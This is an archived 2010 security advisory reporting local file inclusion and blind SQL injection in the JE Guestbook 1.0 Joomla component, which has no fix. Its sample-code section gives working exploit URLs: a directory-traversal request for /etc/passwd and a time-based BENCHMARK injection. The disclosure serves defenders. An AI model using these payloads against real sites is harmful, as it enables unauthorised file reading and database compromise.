Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24820
HistoryOct 01, 2010 - 12:00 a.m.

JE Guestbook 1.0 Joomla Component Multiple Remote Vulnerabilities

2010-10-0100:00:00
vulners.com
24

JE Guestbook 1.0 Joomla Component Multiple Remote Vulnerabilities

Name JE Guestbook
Vendor http://www.joomlaextensions.co.in
Versions Affected 1.0

Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-09-30

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX

I. ABOUT THE APPLICATION


JE Guest Component is an open source Joomla guestbook
component with spam protection and many customization
options.

II. DESCRIPTION


Some parameters are not properly sanitised.

III. ANALYSIS


Summary:

A) Local File Inclusion
B) Multiple Blind SQL Injection

A) Local File Inclusion


Input passed to the "view" parameter in jeguestbook.php
(when option is set to com_jeguestbook) is not properly
verified before being used to include files. This can be
exploited to include arbitrary files from local
resources via directory traversal attacks and
URL-encoded NULL bytes.

B) Multiple Blind SQL Injection


Many parameters are not properly sanitised before being
used in SQL queries.This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.

IV. SAMPLE CODE


A) Local File Inclusion

http://site/path/index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00

B) Multiple Blind SQL Injection

http://site/path/index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))

V. FIX


No fix.